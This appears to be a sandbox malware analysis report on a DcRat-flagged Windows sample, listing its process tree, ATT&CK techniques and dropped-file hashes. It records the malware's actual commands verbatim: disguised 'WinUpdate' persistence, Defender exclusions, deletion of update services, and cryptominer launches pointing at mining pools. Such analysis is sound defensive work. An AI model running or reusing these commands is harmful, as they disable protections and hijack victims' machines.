C:\Users\Admin\AppData\Local\Temp\f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
"C:\Users\Admin\AppData\Local\Temp\f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe"
2⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2304

C:\Users\Admin\AppData\Local\Temp\ED43.exe
C:\Users\Admin\AppData\Local\Temp\ED43.exe
2⤵
- Executes dropped EXE
PID:3948

C:\Users\Admin\AppData\Local\Temp\F60E.exe
C:\Users\Admin\AppData\Local\Temp\F60E.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 980
3⤵
- Program crash
PID:4976

C:\Users\Admin\AppData\Local\Temp\282.exe
C:\Users\Admin\AppData\Local\Temp\282.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"
3⤵
PID:932

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"
4⤵
- DcRat
- Creates scheduled task(s)
PID:5040

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:80 -u 48KAmnwZUxBRbm4hKTpM1x6ucn4UqmdBwaojP5ka3kVWfpHEXRvLHq1NuE1s4R4yWRS663yNRe2EKZNXk96cJHL51BaXhga -R --variant=-1 --max-cpu-usage=40 --donate-level=1 -opencl --pass neweramining
3⤵
PID:4760

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.shaxta -p x -t 6
3⤵
PID:5160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\988.exe
C:\Users\Admin\AppData\Local\Temp\988.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744

C:\Users\Admin\AppData\Local\Temp\tmp40FB.tmpmomuxluwyocb.exe
"C:\Users\Admin\AppData\Local\Temp\tmp40FB.tmpmomuxluwyocb.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:3876

C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe
"C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E86.tmp.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:4356

C:\Windows\system32\timeout.exe
timeout 4
5⤵
- Delays execution with timeout.exe
PID:916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /f /sc MINUTE /mo 5 /tn "Infrastructure protection v3.39" /tr "'C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe"'
5⤵
- DcRat
- Creates scheduled task(s)
PID:4672

C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe
"C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe"
5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4968

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3676

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:3408

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3972

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:2568

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4984

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:5012

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:1176

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:1680

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4284

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4920

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4948

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2264

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4696

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1216

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1512

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1704

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1392

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:2628

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4952

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#weslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WinUpdate" } Else { "C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe" }
2⤵
PID:64

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WinUpdate
3⤵
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Modifies data under HKEY_USERS
PID:3780

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4524

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4992

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1324

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3332

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2556

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1064

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4956

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3048

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1992

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2372

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:3644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }
2⤵
PID:3592

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ufwnctgi
2⤵
PID:4448

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
PID:5080

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:4348

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
PID:3388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe nfwhyehyzpwozpzk 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaKW39bcEzw2phqIF3Eso9UtgnI2Wi7MLZ/WiQv30b+/LqJwsRxsDqAdx302+rKNAZYgGA4HcQ+AFdMJG7bRpmm+9G+TdR+H5eh8nVXu/FNkRZuSzmgNGrJvJFMNgo7LD6F5vrUgonTcK4hU3/59UFYjpducpXlGsjqvTztQC69saNlurNkFL6uQb3XGO2OtaldqDEprNzItKYqRIo82wC0awsZMPIPjqs4thi7pNmSxKBgmipuZv5Hmlnjpms4d9e7zO4teZFsKR0rst3xCjWSL49/c2n6wr4EypqvuySt3+vrCGNkIw24XlDzW3UeWX2Y8ii3kttNnbfo69aFYEjwdg+zhWNeoFRYGjZwzLXWW/ZdAE9eA75GkJXa+/YxLwz3r8ohAllCdYtRD5xJQ7Yv1N3v/sKorGxDYj8fbnLcaC95xXZhF9eQlftzfDs35gZFEgd7DhlzXv+H2fR7ifbtXttbSj0/i+bc2GB6SXQYrhkhAF5u0/13o06LMDvwdPCrRv5pBsC4KwfUiTLzjHOcalzGKacSCGYXWXAqRVnj09L+ByHVwM4W0ojf36QNZuG8jbg181Z0LV/6opqgpizgH4R3ADFHB0+Lzu7hG9rkU1Mec2T/yYv2BLqwQcbTnomhXruvllXEiizynFb4VBkblzmcPjts16jYJCtzkweTasA7wa2lCLmOpmymcMcxtDWm3GcNEuLLgAow0U9Tibx/MX9tSrOOu8KlOB9tF/KJpUtA2cDDgtGuc7a6Lh7OJhYvHdDf7zJjOdUQhZ5kTZfI4s7gpi3ckjsq8/gHmMaqtIXtVvuNOI8AELzlQ08HUR1gpiMN3MXhVFQmzK4p3Hd8YoRNfx8g/H7dQeKyFcUD9OmrqMrE4s3W3r1Vnug9Xw7gBJbOuZkt7ZcyBMiddadDUbSrhx/F445juBGv7wnUAoyE7oTFOzmjYp5QC1vnvCQdcT5fQj6TIwF++FupLlwARmreRtzhouwPOoO3DBIY2QwlP1ywyJcO/eXL5Qy92zhut1tnQkSbfuxo8XQUv8ntBWjaEXP1hH7xAVBR8AQRrbuYyDo8+OKEuMN0YxpCtTgumGjwT1zlMxzE2TETmj3HBJ5yCmqcqRgHLMcR6XIefR4vvR7wnqsGCsnvagvG7f356mL66jIcLcteoeY0bnlyRRe2+f3SnHUzSvbsezoRiCvu9frZBu0cSJiIA+F4Ofnw1PNqOby0ZTRe4dNniwgNO8Vj3n6dS4MK2zxu2dzk3/cD0SexKSz+oCKc71c4GbP3E6uVguiKtRJHr3yBv3elFKXe3BCxEHlF830kyInFQbidWKpar9Pin1QTYhz2422J85eVxPFkr+9mmlpf/KA8kGYe+64Ok14KJ6mK21yCNCMN8K6Zsu8e3FEFNWCmlJ6h+XISd7p2MVlD+oUtB5JX08z8/7GPACpEcFi8aTs2zfOFeRM2n3fo4H0UiwJeInzf6VBP8FPrQx+YJ27iSf7/6i8UybQYxMGMtFJJ+Rh+Zx8yDcGzzdxhNQYL0UM1YTNAiOccNUUI40DMjEtTiHtH86rZiJAV56SWDOJYQnHZVYBrY8Eq2gJp53Qv+v6hSbtyPDF1lPdgPKzBZ4ZTNCiGFHcI4KcwqFjrfV1U4qDx5+sR0GakHwD2qwUbnyVvolvBpJd8rO6VFsg8MjgNhKPtldGkDONSG3Zya8fICF8WwuOEQl8tgxTpOUPQJKMFBx1gFEa/tulw75LGqVIkkCdxiil5o1vIDx5P09PwOTy9LXeB7C0wPSGqcrGFpnHUqID2suYT6nTpf3cVvAs7e4CKJNjuHCq5EfaLVa3nwOaQAklnut3sySHvurSbhRq3NuJbWKfrV/7xOBt4wnGmGd5NvwiLim0ZEqX0zsdM873Krbn0NaDNSTIJqshtEg8kO7wOgYTLDUg9GOqJekWT08BmriNA/o5Py8mTsh8sTbNUqRYYqrlYA6LRdORhaTD0WjHFOXOQ2Xg7zIgH7mRd/XkmWDs4ll0NOGyjKZlrnBWG42rYViH92A0vjV23D+IYRncsq0PREe7YQI02IBX0eYNWCYngsDXOL/0hmug2qRyc9QMdeg00rGa0ifaoZ+kYCF88VweEq+p5AU5VJuMRVAE728glubpnbUAgzZFITdrk0+GZ/9NMrDVx7CdGOwI6SKiC+YxeUx+jTmQW35RjBBcsjYrJw/V1HwTVLKVy6kGQZsFPiDBeJEOJ4BtmuTR67sndS+L9d+pj15Vr3CkVzltp0rYLA8jOaFa9gFByPOGf2+SlcU+rhclOdoksgdi4nOBYhE0g2PR9N6izrUmei8T1VQ72Zlj1Do9D6QcPZs8eS/q9ZhEi+WpRWeN4D3+3saNzg0EbMzO8kcHqfaTKWyiTEXRSEavkDdOqEywDIH5Z+5Uka+k6jAZ8NjP6GAyQ6mAtYYH8RuAITWyFZSDWSbaIhhSRm2agZWt83KHxSDLz555ZR5wJGL9c/DEOUnCw52EIOKjtrVHHmc0Ln9eDJbKfn3jxEHXfTtGEqhNIFO5L5RaFqaB8oSYfowCSF9BF/3MwhhlrzIq6Pfn65ofPfHGUTkcb4tAiM+OBIllRXejtXdzSMJtl8TzYTIBQYr3YNOzh/IDBJNtRW1B87yiUfbmQgFszXs+YScWdevXaHUqVESvASVjWwUlOGqQqV5jOGrbpWGNC7kJKVdIR5rQZVtnzCmRXkry5hGHzbG0zH5XkupqgawCiI2CtA/3XcuM0Rg+Zxjir1Jgiq5w2jJt/K5x5JEeXuOm5Azx9iURZpai38cGWVtn3MZBbZgT7JKyh2H4hywN6wjj7YmafXHhGTtGw7st1mnCROl4lbhLDkNJK/qP1aGwIUMqlQ3L9t1za8WquGPjrNL7ZMSu5CJkCcj8qjrsaLduqRArttEJ7bw9FLEL0XwMlFcFpMOYMDWGFCe6/pxSCyE8Gm09Aw2LAOuz4C9ssx40AOhS4vv/SOJAoMFGE404XvK7X/JCFKrMRtHQIk6R4Bg0OKGnNPxUl6vqUOA/dbh458OgcdqqINJkYh+dqP2Ob6pKN+q7+cpN78pzRQKZra2zfP4qW/fd+T51lWtLYH0xLIukd0CpLJ8DUrLPhxBlQM6Mo4RahVem3L7+Ed+9JynyvaXYPbGoG9PWoKTXdP2ACq9fE6zWFv7xDzxLPOZhmd30iL2oSc7HFkwTqv7nZDBBhoedJuV8UaxJUpeWOjomAwPqXP6XTC50EQL8P/YvuoXc9FG4F5SvTwKX1uWwC0KEEo9k5qsOCG9iGJ9JCmtNXT/2p377Mv8WDb+Ul3wDqSWWn2gOahUwxJ8HRHyoPVaxstc5h1ZcIlalcbrrwgWkbdcEcCt4sXzT1E9lJehE8yemVKqBhFj5dKrMSQQi/BGPu6ziyiuBqYOZt8l9bcPGKx+APes5oGN9dX2aiadvG5quNsLSYiFnu/pWCJR8z6YiZTrqWGnzvi70/D+Vzhz94yURBGmF4uWs7LYLK8/ZeR5+eqeLsokn3gM3MFoPpk4S8P5vchuxHHsUV/dA9Uu1Kzg6t2gamBXnocAuItghKeVNvz06jsqxy70AWfEJIT5UbhntilWyCg+FxCZgtaTxkwFfgoys7KoTeeKmfuOjYAeStu+PsXCk707LpR6im3G6SrfrZJtP+fZrFTIQi90twBmabJREjqnSIU38kW3o5loKyWONt+fvSFI0hLpHOzdvJVgTUSc3DHFkLVbYQ23jdGMq+ZHt8C/NLyWRGCjGyUXCzC9a2eNnEXVFS5CYlcVz80j8DujFGQJa3tH1rHpPa7w4OLsfZm6CkUQE5YdJE79ouRTenPUc++bc8bNDApWhUgU/S0XKkOg/lLe93rsmpBnXnTXRTRUW6Q3s2eonWEn/1v0Bxl5vFgCHXtDwZquI3CKhfmEt8AX5wFWrKAT2MEsLYWoxf07fTHz3PRLS3qoZJTii1fXtyXENVQ3O0xw30JpCIblNlnePJoA3Ujp0EyFcuVbZmImQoXhGPeHNAfg7LkZoINlIkqRDCoUQKQCYTg0LQUYAbmItrdwmd0LGh4GuUIj4P2md4Jx/nVu8vU2sTGEsmVx6ZV5cUrhLxQeT72ThtosF586juGFI2N1l+a8or8IV4yi7XB4fCwASZ37vtc4LjsZ0X5pNrM25oJL2md6+O6Scs3IMyS2wKtbtJPLr3dZwiUgT5w8EIZ5mMWJTTnEuhHDelMHpJISbaElG9ke2vqoNXYAstMBDnD9tzX2vs09nXQooZrnDNeehhK4xk83874miSiaUmgg5c/icAleL31fwmG5tiNa1QQKBwVRoWdhwHNYJniyYyqQGlZVXsMFeWgF8JSsusn74WuwzWt3ZXp0ktbi9vDRs6dXjOvlnKZ6a+/9qnStsECKoGWc3AyjeZuAudGLn55ajBPYkKT1mVP7+y/XGyFSiyk/KUbSwcxTm3VG/Xj39WOIgdM5VObfXOVAUzAgxGCLZ2WDCSrILjD+lj8pAN3ryvqNznYCPZRS2NmmHudycEYjXo5Ai2+jTwcyXN6V0BA0nI24D3WyZELHhfHGhvvvXYr9Yh78+pRePAkYGfBp9tLM0aOVXUaJ80cP0VKU4h5NcUdMVeY9Bt2DPjHbSlkJCcEuEVxIRkKBy2PRWJId8xt4M7o70Bdhkdjc/hlLzFwMwi56z+94jYEij6Xwmt7nik4z3eaFaa+GsjYjp0Npaigp1jNQnDwB8K5ye97WauumUl7ydjNdhqeocuVDGrYcOtUpIxzNoGbOVQTUaQiw8+HY0yn1Ql3LRVYsxc7MMcidhj4Jx6qQ1S7NIG8qt+vXRrubP2+1/xM+D8xQJ3MYK7UUyoTF0tiebTAhpRq0Wt6UaxI7fKvl+w3dfQ0e2sskbYhalsQqxEzrEH5waklTbyu7gD3bfMHBME3c70TaHjMUVHWNmIIUNOa9MjbvNO2xHXtSxv7IkLqbYY3bR7OWar0D2IVDaHUg2pjDyqNkgWd4QWi4UHr6TsniEKgTrOX2mD77XpxY1CmzNVHXrjk7qee0j9CewU1Yj12iWdOt6jl1mpYfQTBSWwtypJrlq31b1Me6kemD4zcWwWZQIF0PqXk37FtRQpMVFBcHMNO05zaGQI6k9B6yrWSJ/JnoVC6rT5hQD+eTYD43OwhhnegVs++yhaRFDrW0hBMoc6rpmRkdmuuxsToR2lnSIxbkrrPFpISMOO5gUvYEsHQkLRxHR6M3ATeKH0sD6gdERCYRk7+D3/7HtiB2cjkRGDyqVGM9NlgiAygoWvM8Y7hxAHWtMQyc6bUCAnugfDTgMBBojMPuYLK31K85VWrpEtmmxsfSKSpl5Qo9mNRBXDzV1NkZU4npjNUxBFhM5fP0wA3a1JiJW090ubuI69bWi09w41ZyhcCA+BiiIftikzYk4ZY1HOSObf0Kwq2P7trQfjN55aJCe5Zo2xbQVucqBbdlodU8wfhyNGXJh+bTEAZoqPFwHHVeSjkQNQSQTdf6kHum52NcWEbJHkHnK3FzZlshCzXHAcfiKK1VrKwwNiJI4Qqc2shsMfpzZmFeUfb/xWoN4yokHNe539czGgQfuWaZfDD73Jz/6VH54lLbCxTEwNAiStuxOpcmjOYfiJ0d2+X+8WqRDoAY16vf+JAv3bdGqOkklHhdshoSpEbdSj38/KiroXpoqPvgsX4ZdlwtXjV+obDTvkLX316ZIdWmGcoWV98V1l/9kjj+NQCT8rtupabB6zTRd6dYvG6Xyobaf7fOIwNNgV8oaMC7OmGDNuAu/Et5RnPLRqPiRtJTjbB4fLEElsDyBg1FrPlkwb8BrawFXBf007MXaUcMUxe4666YzcJlDIcmhKL7N79ZvBX5fXD1InrpBfv9+08BviUCqv3sjZ/AWIMmc/hvyvY6VGxRCtJflQsP22o9vddF/xA634Ew7VVkKj8NnHJIb7uLJhGHpymqnQNAneDx7woCjys9xMrBGcb5zFcuWb7UpE6t1BtrjiViUxGQfGEqNq8hqGkUc9DxUFpmdef0AqqjJv31Kgt5MSjorswmAIqYkXcQqzhxY/eWXWE2pxpaW9oY+GkqljEeovbl4lmkBIpLiKKmWDxbGGVwDL//0QpL6Gu6IeWkWmFBbboKON88dl8XDZTmMdx5bsIt0YU4UgD0sziRVkDAPqoMy/WvpdjZvFM8dKQ0gSabVUfyuKJMpkEfTbvpT58TOhPSlV7wpUWkD6rrHmHiDyzSUZRT6NhFMPWG9KK8479nJlUJgSW6vlaPW5bAd9OdRUlD8fDBcJ5PrOnroe3OEZwmk8KxmOtNFDwzp6/ztwQDv0wNGwfBXKkg6hYRGFe76AiBg/fPaW0jsAIRlbyk1WmKJEPY+dFpV6VekxZSO9Y10MFlwQc8mwtKcg8ebyLcrl/YQ4UCCnllhB7KugX3WSGIHs1YnTyd/KmGsBhmwe018NGmKdCFqWv5xjYP1wzzX7g1FyDfRSxzLKJ68zPRvBqS/Zavkfwfune/j6e89aIcKnMm0QeKFbfOo7GyW28mI86mXPnMBO4LNJ+2BTp0YHb9Q6whC49mqQ1C4f6JgouS07a40kVVQRfIYQXvXQwbv8sYcqLMQHR1sokUkiA3ue835ZsBIkiP3yN+kuYmEmpOX+ozCB6Z+2MC/hzqpDte5xAehb5WT3xnbJ6oQkV315xGB14omIjkDAgQxoZC72xbJGxDQse9Aa6F0PWcOG6+2eP/japQyDJ3HaYjJfTOvI48wu8I8zHE85cxZay3KlI0QbbJtpdzf8EthwdAO/vAJ/hwY1hRqP7XsocX8v1y4Fh1nFqne1i/GuIilvomSX4SU9bTBumBCGVXUzCwWTGDjS+7RdgJLlYr0CtY6Wg6JNurii9j6Pdr66Kdlk8szI6C16BrI70sDa3p8MPE1qdMo5Ufk3rt4b+yQi+k/AzkBUvdm8Lt7h+oWXO87veiMXwGhl9uAKe5xL8FE0wPmFxfT50soMOPTpV3hbEQlUckj15RHGiWa8F3jnhVjDkNXVT22sdfNkl72883hYBc5XnXeFxK7yhwfyZmHr9g9ejHtaM0tHjfyg7lsXk+O1Ds/3GVAtfg0VteOyoN9Fq+hO8+1U/AR+73mX8ZmqvP//mfYuXnFyqQqPLm+Y7pkINucAEPmRc+HS+Blzzl2tmI5YDBKvYLzJJSXz7B5ugcG6Gw==
2⤵
PID:4112

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1396 -ip 1396
1⤵
PID:3468

C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe
"C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3964

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe
Filesize
7.6MB

MD5
8e9fe0d0efafefa00a222ddee017327a

SHA1
602bf696e8533ff030193435d09ccc0c964871a7

SHA256
9b4a1011466da15c2ef7ad0a1f462b7903d3c8158c16b0c67c3e75ef992e979b

SHA512
523564c29a8a4c4c5d227039d7f647d9874ed7dd40e08dfcd4628045d3193f3061606a7790c8ff238a403773118e8cae2fa7dfed2271293d8c72082421d127c4

Download Submit
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe
Filesize
7.6MB

MD5
8e9fe0d0efafefa00a222ddee017327a

SHA1
602bf696e8533ff030193435d09ccc0c964871a7

SHA256
9b4a1011466da15c2ef7ad0a1f462b7903d3c8158c16b0c67c3e75ef992e979b

SHA512
523564c29a8a4c4c5d227039d7f647d9874ed7dd40e08dfcd4628045d3193f3061606a7790c8ff238a403773118e8cae2fa7dfed2271293d8c72082421d127c4

Download Submit
C:\ProgramData\AppVirtualBoxHelp\URRERK.exe
Filesize
315.1MB

MD5
8b24a90126213cdb2b3ca983e3885f2a

SHA1
c30f53ca388e3dee48a6fdecb1b28f34d61179fb

SHA256
575c29654e748301aa94c94f2eda45f793f56acbee943ae1f63eaadbf8cafa01

SHA512
